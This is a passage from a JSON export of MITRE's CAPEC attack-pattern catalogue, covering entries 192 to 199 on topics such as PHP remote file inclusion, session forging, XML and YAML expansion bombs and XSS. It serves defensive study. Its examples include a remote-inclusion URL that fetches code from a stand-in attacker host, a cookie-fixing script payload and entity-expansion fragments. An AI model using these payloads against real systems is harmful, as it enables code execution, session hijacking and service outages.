constants."]},"Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"167","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":"Access to a binary or executable such that it can be analyzed by various utilities."},"Resources_Required":{"Resource":"Binary analysis programs such as \'strings\' or \'grep\', or hex editors."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"798"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1552.001","Entry_Name":"Unsecured Credentials:Credentials in files"}},"References":{"Reference":[{"External_Reference_ID":"REF-51","Section":"Decompiler"},{"External_Reference_ID":"REF-52","Section":"Debugger"},{"External_Reference_ID":"REF-53","Section":"Disassembler"}]},"Notes":{"Note":{"Type":"Other","p":["More sophisticated methods of searching for sensitive strings within a file involve disassembly or decompiling of the file. One could, for example, utilize disassembly methods on an ISAPI executable or dll to discover a hard-coded password within the code as it executes. This type of analysis usually involves four stages in which first a debugger is attached to the running process, anti-debugging countermeasures are circumvented or bypassed, the program is analyzed step-by-step, and breakpoints are established so that discrete functions and data structures can be analyzed.","Debugging tools such as SoftICE, Ollydbg, or vendor supplied debugging tools are often used. Disassembly tools such as IDA pro, or similar tools, can also be employed. A third strategy for accessing sensitive strings within a binary involves the decompilation of the file itself into source code that reveals the strings. An example of this type of analysis involves extracting source code from a java JAR file and then using functionality within a java IDE to search the source code for sensitive, hard-coded information. In performing this analysis native java tools, such as \\"jar\\" are used to extract the compiled class files. Next, a java decompiler such as \\"DJ\\" is used to extract java source code from the compiled classes, revealing source code. Finally, the source code is audited to reveal sensitive information, a step that is usually assisted by source code analysis programs."]}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary, Other_Notes, References, Related_Attack_Patterns, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Name, Description, Related_Attack_Patterns, Taxonomy_Mappings"}],"Previous_Entry_Name":["Read Sensitive Strings Within an Executable",{"Date":"2020-07-30"}]}},"192":{"ID":"192","Name":"Protocol Analysis","Abstraction":"Meta","Status":"Stable","Description":"An adversary engages in activities to decipher and/or decode protocol information for a network or application communication protocol used for transmitting information between interconnected nodes or systems on a packet-switched data network. While this type of analysis involves the analysis of a networking protocol inherently, it does not require the presence of an actual or physical network. Although certain techniques for protocol analysis benefit from manipulating live \'on-the-wire\' interactions between communicating components, static or dynamic analysis techniques applied to executables as well as to device drivers, such as network interface drivers, can also be used to reveal the function and characteristics of a communication protocol implementation. Depending upon the methods used the process may involve observing, interacting, and modifying actual communications occurring between hosts. The goal of protocol analysis is to derive the data transmission syntax, as well as to extract the meaningful content, including packet or content delimiters used by the protocol. This type of analysis is often performed on closed-specification protocols, or proprietary protocols, but is also useful for analyzing publicly available specifications to determine how particular implementations deviate from published specifications.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Prerequisites":{"Prerequisite":["Access to a binary executable.","The ability to observe and interact with a communication channel between communicating processes."]},"Skills_Required":{"Skill":["Knowlegde of the Open Systems Interconnection model (OSI model), and famililarity with Wireshark or some other packet analyzer.",{"Level":"High"}]},"Resources_Required":{"Resource":"Depending on the type of analysis, a variety of tools might be required, such as static code and/or dynamic analysis tools. Alternatively, the effort might require debugging programs such as ollydbg, SoftICE, or disassemblers like IDA Pro. In some instances, packet sniffing or packet analyzing programs such as TCP dump or Wireshark are necessary. Lastly, specific protocol analysis might require tools such as PDB (Protocol Debug), or packet injection tools like pcap or Nemesis."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data","Note":"Successful deciphering of protocol information compromises the confidentiality of future sensitive communications."},{"Scope":"Integrity","Impact":"Modify Data","Note":"Modifying communications after successful deciphering of protocol information compromises integrity."}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"326"}},"References":{"Reference":[{"External_Reference_ID":"REF-57","Section":"Proprietary protocol"},{"External_Reference_ID":"REF-50","Section":"Reverse engineering"}]},"Notes":{"Note":{"Type":"Other","p":["There are several challenges inherent to protocol analysis depending upon the nature of the protocol being analyzed. There may also be other types of factors which complicate the process such as encryption or ad hoc obfuscation of the protocol. In general there are two kinds of networking protocols, each associated with its own challenges and analysis approaches or methodologies. Some protocols are human-readable, which is to say they are text-based protocols. Examples of these types of protocols include HTTP, SMTP, and SOAP. Additionally, application-layer protocols can be embedded or encapsulated within human-readable protocols in the data portion of the packet. Typically, human-readable protocol implementations are susceptible to automatic decoding by the appropriate tools, such as Wireshark/ethereal, tcpdump, or similar protocol sniffers or analyzers.","The presence of well-known protocol specifications in addition to easily identified protocol delimiters, such as Carriage Return or Line Feed characters (CRLF) result in text-based protocols susceptibility to direct scrutiny through manual processes. Protocol analysis against protocol implementations such as HTTP is often performed to identify idiosyncratic implementations of a protocol by a server or client. In the case of application-layer protocols which are embedded within text-based protocols, analysis techniques typically benefit from the well-known nature of the encapsulating protocols and can focus on discovering the semantic characteristics of the proprietary protocol or API, since the syntax and protocol delimiters of the underlying protocols can be readily identified.","When performing protocol analysis of machine-readable (non-text-based) protocols difficulties emerge as the protocol itself was designed to be read by computing process. Such protocols are typically composed entirely in binary with no apparent syntax, grammar, or structural boundaries. Examples of these types of protocols are IP, UDP, and TCP. Binary protocols with published specifications can be automatically decoded by protocol analyzers, but in the case of proprietary, closed-specification, binary protocols there are no immediate indicators of packet syntax such as packet boundaries, delimiters, or structure, or the presence or absence of encryption or obfuscation. In these cases there is no one technology that can extract or reveal the structure of the packet on the wire, so it is necessary to use trial and error approaches while observing application behavior based on systematic mutations introduced at the packet-level. Tools such as Protocol Debug (PDB) or other packet injection suites are often employed. In cases where the binary executable is available, protocol analysis can be augmented with static and dynamic analysis techniques."]}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Activation_Zone, Attacker_Skills_or_Knowledge_Required, Description Summary, Injection_Vector, Other_Notes, Payload, Payload_Activation_Impact, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required, Related_Weaknesses"}],"Previous_Entry_Name":["Protocol Reverse Engineering",{"Date":"2015-11-09"}]}},"193":{"ID":"193","Name":"PHP Remote File Inclusion","Abstraction":"Detailed","Status":"Draft","Description":"In this pattern the adversary is able to load and execute arbitrary code remotely available from the application. This is usually accomplished through an insecurely configured PHP runtime environment and an improperly sanitized \\"include\\" or \\"require\\" call, which the user can then control to point to any web-accessible file. This allows adversaries to hijack the targeted application and force it to execute their own instructions.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"253"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey application] Using a browser or an automated tool, an adversary follows all public links on a web site. They record all the links they find.","Technique":["Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.","Use a browser to manually explore the website and analyze how it is constructed. Many browser\'s plugins are available to facilitate the analysis or automate the URL discovery."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt variations on input parameters] The attack variants make use of a remotely available PHP script that generates a uniquely identifiable output when executed on the target application server. Possibly using an automated tool, an adversary requests variations on the inputs they surveyed before. They send parameters that include variations of payloads which include a reference to the remote PHP script. They record all the responses from the server that include the output of the execution of remote PHP script.","Technique":["Use a list of probe strings to inject in parameters of known URLs. The probe strings are variants of PHP remote file inclusion payloads which include a reference to the adversary controlled remote PHP script.","Use a proxy tool to record results of manual input of remote file inclusion probes in known URLs."]},{"Step":"3","Phase":"Exploit","Description":"[Run arbitrary server-side code] As the adversary succeeds in exploiting the vulnerability, they are able to execute server-side code within the application. The malicious code has virtual access to the same resources as the targeted application. Note that the adversary might include shell code in their script and execute commands on the server under the same privileges as the PHP runtime is running with.","Technique":"Develop malicious PHP script that is injected through vectors identified during the Experiment Phase and executed by the application server to execute a custom PHP script."}]},"Prerequisites":{"Prerequisite":["Target application server must allow remote files to be included in the \\"require\\", \\"include\\", etc. PHP directives","The adversary must have the ability to make HTTP requests to the target web application."]},"Skills_Required":{"Skill":["To inject the malicious payload in a web page",{"Level":"Low"},"To bypass filters in the application",{"Level":"Medium"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Implementation: Perform input validation for all remote content, including remote and user-generated content","Implementation: Only allow known files to be included (allowlist)","Implementation: Make use of indirect references passed in URL parameters instead of file names","Configuration: Ensure that remote scripts cannot be include in the \\"include\\" or \\"require\\" PHP directives"]},"Example_Instances":{"Example":{"div":{"style":"margin-left:10px;","ul":{"li":["The adversary controls a PHP script on a server \\"http://attacker.com/rfi.txt\\"","The .txt extension is given so that the script doesn\'t get executed by the attacker.com server, and it will be downloaded as text. The target application is vulnerable to PHP remote file inclusion as following: include($_GET[\'filename\'] . \'.txt\')","The adversary creates an HTTP request that passes their own script in the include: http://example.com/file.php?filename=http://attacker.com/rfi with the concatenation of the \\".txt\\" prefix, the PHP runtime download the attack\'s script and the content of the script gets executed in the same context as the rest of the original script."]}}}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"98"},{"CWE_ID":"80"}]},"References":{"Reference":[{"External_Reference_ID":"REF-59","Section":"WASC-05 - Remote File Inclusion"},{"External_Reference_ID":"REF-60"},{"External_Reference_ID":"REF-30","Section":"OWASP Top 10 2007 A3 \u2013 Malicious File Execution"},{"External_Reference_ID":"REF-621","Section":"PHP File Inclusion"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances, Payload_Activation_Impact, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow, Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"194":{"ID":"194","Name":"Fake the Source of Data","Abstraction":"Standard","Status":"Stable","Description":"An adversary takes advantage of improper authentication to provide data or services under a falsified identity. The purpose of using the falsified identity may be to prevent traceability of the provided data or to assume the rights granted to another individual. One of the simplest forms of this attack would be the creation of an email message with a modified \\"From\\" field in order to appear that the message was sent from someone other than the actual sender. The root of the attack (in this case the email system) fails to properly authenticate the source and this results in the reader incorrectly performing the instructed action. Results of the attack vary depending on the details of the attack, but common results include privilege escalation, obfuscation of other attacks, and data corruption/manipulation.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"151","Exclude_Related":{"Exclude_ID":"512"}},{"Nature":"CanPrecede","CAPEC_ID":"657"},{"Nature":"CanPrecede","CAPEC_ID":"667"}]},"Prerequisites":{"Prerequisite":"This attack is only applicable when a vulnerable entity associates data or services with an identity. Without such an association, there would be no reason to fake the source."},"Resources_Required":{"Resource":"Resources required vary depending on the nature of the attack. Possible tools needed by an attacker could include tools to create custom network packets, specific client software, and tools to capture network traffic. Many variants of this attack require no attacker resources, however."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Alter Execution Logic","Note":"By faking the source of data or services, an adversary can cause a target to make incorrect decisions about how to proceed."},{"Scope":"Integrity","Impact":"Gain Privileges","Note":"By impersonating identities that have an increased level of access, an adversary gain privilege that they many not have otherwise had."},{"Scope":"Integrity","Impact":"Hide Activities","Note":"Faking the source of data or services can be used to create a false trail in logs as the target will associate any actions with the impersonated identity instead of the adversary."}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"287"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"38","Entry_Name":"URL Redirector Abuse"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"195":{"ID":"195","Name":"Principal Spoof","Abstraction":"Standard","Status":"Draft","Description":"A Principal Spoof is a form of Identity Spoofing where an adversary pretends to be some other person in an interaction. This is often accomplished by crafting a message (either written, verbal, or visual) that appears to come from a person other than the adversary. Phishing and Pharming attacks often attempt to do this so that their attempts to gather sensitive information appear to come from a legitimate source. A Principal Spoof does not use stolen or spoofed authentication credentials, instead relying on the appearance and content of the message to reflect identity. The possible outcomes of a Principal Spoof mirror those of Identity Spoofing. (e.g., escalation of privilege and false attribution of data or activities) Likewise, most techniques for Identity Spoofing (crafting messages or intercepting and replaying or modifying messages) can be used for a Principal Spoof attack. However, because a Principal Spoof is used to impersonate a person, social engineering can be both an attack technique (using social techniques to generate evidence in support of a false identity) as well as a possible outcome (manipulating people\'s perceptions by making statements or performing actions under a target\'s name).","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"151","Exclude_Related":{"Exclude_ID":"403"}}},"Prerequisites":{"Prerequisite":"The target must associate data or activities with a person\'s identity and the adversary must be able to modify this identity without detection."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Prerequisites"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"196":{"ID":"196","Name":"Session Credential Falsification through Forging","Abstraction":"Standard","Status":"Draft","Description":"An attacker creates a false but functional session credential in order to gain or usurp access to a service. Session credentials allow users to identify themselves to a service after an initial authentication without needing to resend the authentication information (usually a username and password) with every message. If an attacker is able to forge valid session credentials they may be able to bypass authentication or piggy-back off some other authenticated user\'s session. This attack differs from Reuse of Session IDs and Session Sidejacking attacks in that in the latter attacks an attacker uses a previous or existing credential without modification while, in a forging attack, the attacker must create their own credential, although it may be based on previously observed credentials.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"CanPrecede","CAPEC_ID":"384"},{"Nature":"CanPrecede","CAPEC_ID":"61"},{"Nature":"ChildOf","CAPEC_ID":"21"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Analyze and Understand Session IDs] The attacker finds that the targeted application use session credentials to identify legitimate users.","Technique":["An attacker makes many anonymous connections and records the session IDs.","An attacker makes authorized connections and records the session tokens or credentials."]},{"Step":"2","Phase":"Experiment","Description":"[Create Session IDs.] Attackers craft messages containing their forged credentials in GET, POST request, HTTP headers or cookies.","Technique":"The attacker manipulates the HTTP request message and adds their forged session IDs in to the requests or cookies."},{"Step":"3","Phase":"Exploit","Description":"[Abuse the Victim\'s Session Credentials] The attacker fixates falsified session ID to the victim when victim access the system. Once the victim has achieved a higher level of privilege, possibly by logging into the application, the attacker can now take over the session using the forged session identifier.","Technique":["The attacker loads the predefined or predicted session ID into their browser and browses to protected data or functionality.","The attacker loads the predefined or predicted session ID into their software and utilizes functionality with the rights of the victim."]}]},"Prerequisites":{"Prerequisite":"The targeted application must use session credentials to identify legitimate users. Session identifiers that remains unchanged when the privilege levels change. Predictable session identifiers."},"Skills_Required":{"Skill":["Forge the session credential and reply the request.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Attackers may require tools to craft messages containing their forged credentials, and ability to send HTTP request to a web application."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Implementation: Use session IDs that are difficult to guess or brute-force: One way for the attackers to obtain valid session IDs is by brute-forcing or guessing them. By choosing session identifiers that are sufficiently random, brute-forcing or guessing becomes very difficult.","Implementation: Regenerate and destroy session identifiers when there is a change in the level of privilege: This ensures that even though a potential victim may have followed a link with a fixated identifier, a new one is issued when the level of privilege changes."]},"Example_Instances":{"Example":{"p":["This example uses client side scripting to set session ID in the victim\'s browser. The JavaScript code","fixates a falsified session credential into victim\'s browser, with the help of crafted a URL link.","A similar example uses session ID as an argument of the URL.","Once the victim clicks the links, the attacker may be able to bypass authentication or piggy-back off some other authenticated victim\'s session."],"div":["document.cookie=\\"sessionid=0123456789\\"",{"style":"margin-left:10px;","class":"informative"},"http://www.example.com/<script>document.cookie=\\"sessionid=0123456789\\";<\/script>",{"style":"margin-left:10px;","class":"informative"},"http://www.example.com/index.php/sessionid=0123456789",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"384"},{"CWE_ID":"664"}]},"References":{"Reference":[{"External_Reference_ID":"REF-62"},{"External_Reference_ID":"REF-63","Section":"Testing for Session Management"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"}]}},"197":{"ID":"197","Name":"Exponential Data Expansion","Abstraction":"Detailed","Status":"Draft","Description":"An adversary submits data to a target application which contains nested exponential data expansion to produce excessively large output. Many data format languages allow the definition of macro-like structures that can be used to simplify the creation of complex structures. However, this capability can be abused to create excessive demands on a processor\'s CPU and memory. A small number of nested expansions can result in an exponential growth in demands on memory.","Alternate_Terms":{"Alternate_Term":[{"Term":"Billion Laughs Attack"},{"Term":"XML Bomb"},{"Term":"XML Entity Expansion (XEE)"}]},"Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"230"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the target] An adversary determines the input data stream that is being processed by a data parser that supports using subsitituion on the victim\'s side.","Technique":["Use an automated tool to record all instances of URLs to process requests.","Use a browser to manually explore the website and analyze how the application processes requests."]},{"Step":"2","Phase":"Exploit","Description":"[Craft malicious payload] The adversary crafts malicious message containing nested exponential expansion that completely uses up available server resource."},{"Step":"3","Phase":"Exploit","Description":"[Send the message] Send the malicious crafted message to the target URL."}]},"Prerequisites":{"Prerequisite":"This type of attack requires that the target must receive input but either fail to provide an upper limit for entity expansion or provide a limit that is so large that it does not preclude significant resource consumption."},"Skills_Required":{"Skill":["Ability to craft nested data expansion messages.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":["Unreliable Execution","Resource Consumption"],"Note":"Denial of Service"}},"Mitigations":{"Mitigation":["Design: Use libraries and templates that minimize unfiltered input. Use methods that limit entity expansion and throw exceptions on attempted entity expansion.","Implementation: For XML based data - disable altogether the use of inline DTD schemas when parsing XML objects. If a DTD must be used, normalize, filter and use an allowlist and parse with methods and routines that will detect entity expansion from untrusted sources."]},"Example_Instances":{"Example":[{"p":["The most common example of this type of attack is the \\"many laughs\\" attack (sometimes called the \'billion laughs\' attack). For example:","This is well formed and valid XML according to the DTD. Each entity increases the number entities by a factor of 10. The line of XML containing lol9; expands out exponentially to a message with 10^9 entities. A small message of a few KBs in size can easily be expanded into a few GB of memory in the parser. By including 3 more entities similar to the lol9 entity in the above code to the DTD, the program could expand out over a TB as there will now be 10^12 entities. Depending on the robustness of the target machine, this can lead to resource depletion, application crash, or even the execution of arbitrary code through a buffer overflow."],"div":["<?xml version=\\"1.0\\"?>",{"style":"margin-left:10px;","class":"informative","div":["<!ENTITY lol \\"lol\\">",{"style":"margin-left:10px;"}]}]},{"p":"This example is similar, but uses YAML. This was used to attack Kubernetes [REF-686]","div":["a: &a [\\"lol\\",\\"lol\\",\\"lol\\",\\"lol\\",\\"lol\\",\\"lol\\",\\"lol\\",\\"lol\\",\\"lol\\"]",{"style":"margin-left:10px;","class":"informative"}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"770"},{"CWE_ID":"776"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"44","Entry_Name":"XML Entity Expansion"}},"References":{"Reference":[{"External_Reference_ID":"REF-64"},{"External_Reference_ID":"REF-65"},{"External_Reference_ID":"REF-66"},{"External_Reference_ID":"REF-67"},{"External_Reference_ID":"REF-67"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated @Name, Alternate_Terms, Description, Example_Instances, Execution_Flow, Mitigations, Prerequisites, Related_Weaknesses, Skills_Required"}],"Previous_Entry_Name":["XML Entity Expansion",{"Date":"2021-10-21"}]}},"198":{"ID":"198","Name":"XSS Targeting Error Pages","Abstraction":"Detailed","Status":"Draft","Description":"An adversary distributes a link (or possibly some other query structure) with a request to a third party web server that is malformed and also contains a block of exploit code in order to have the exploit become live code in the resulting error page. When the third party web server receives the crafted request and notes the error it then creates an error message that echoes the malformed message, including the exploit. Doing this converts the exploit portion of the message into to valid language elements that are executed by the viewing browser. When a victim executes the query provided by the attacker the infected error message is returned including the exploit code which then runs in the victim\'s browser. XSS can result in execution of code as well as data leakage (e.g. session cookies can be sent to the attacker). This type of attack is especially dangerous since the exploit appears to come from the third party web server, who the victim may trust and hence be more vulnerable to deception.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"591"},{"Nature":"ChildOf","CAPEC_ID":"592"},{"Nature":"ChildOf","CAPEC_ID":"588"}]},"Prerequisites":{"Prerequisite":["A third party web server which fails to adequately sanitize messages sent in error pages.","The victim must be made to execute a query crafted by the attacker which results in the infected error report."]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Mitigations":{"Mitigation":["Design: Use libraries and templates that minimize unfiltered input.","Implementation: Normalize, filter and use an allowlist for any input that will be used in error messages.","Implementation: The victim should configure the browser to minimize active content from untrusted sources."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"81"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Description"}],"Previous_Entry_Name":["Cross-Site Scripting in Error Pages",{"Date":"2017-05-01"}]}},"199":{"ID":"199","Name":"XSS Using Alternate Syntax","Abstraction":"Detailed","Status":"Draft","Description":"An adversary uses alternate forms of keywords or commands that result in the same action as the primary form but which may not be caught by filters. For example, many keywords are processed in a case insensitive manner. If the site\'s web filtering algorithm does not convert all tags into a consistent case before the comparison with forbidden keywords it is possible to bypass filters (e.g., incomplete black lists) by using an alternate case structure. For example, the \\"script\\" tag using the alternate forms of \\"Script\\" or \\"ScRiPt\\" may bypass filters where \\"script\\" is the only form tested. Other variants using different syntax representations are also possible as well as using pollution meta-characters or entities that are eventually ignored by the rendering engine. The attack can result in the execution of otherwise prohibited functionality.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"591"},{"Nature":"ChildOf","CAPEC_ID":"592"},{"Nature":"ChildOf","CAPEC_ID":"588"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the application] Using a browser or an automated tool, an attacker follows all public links on a web site. They record all the links they find.","Technique":["Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.","Use a browser to manually explore the website and analyze how it is constructed. Many browser\'s plugins are available to facilitate the analysis or automate the URL discovery."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt injection payload variations on input parameters] Possibly using an automated tool, an attacker requests variations on the inputs they surveyed before. They send parameters that include variations of payloads. The payloads are designed to bypass incomplete filtering (e.g., incomplete HTML encoding etc.) and tries many variations of characters injection that would enable the XSS payload. They record all the responses from the server that include unmodified versions of their script.","Technique":["Use a list of XSS probe strings to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier. Attempt numerous variations based on form, format, syntax & encoding.","Use a proxy tool to record results of manual input of XSS probes in known URLs."]},{"Step":"3","Phase":"Exploit","Description":"[Steal session IDs, credentials, page content, etc.] As the attacker 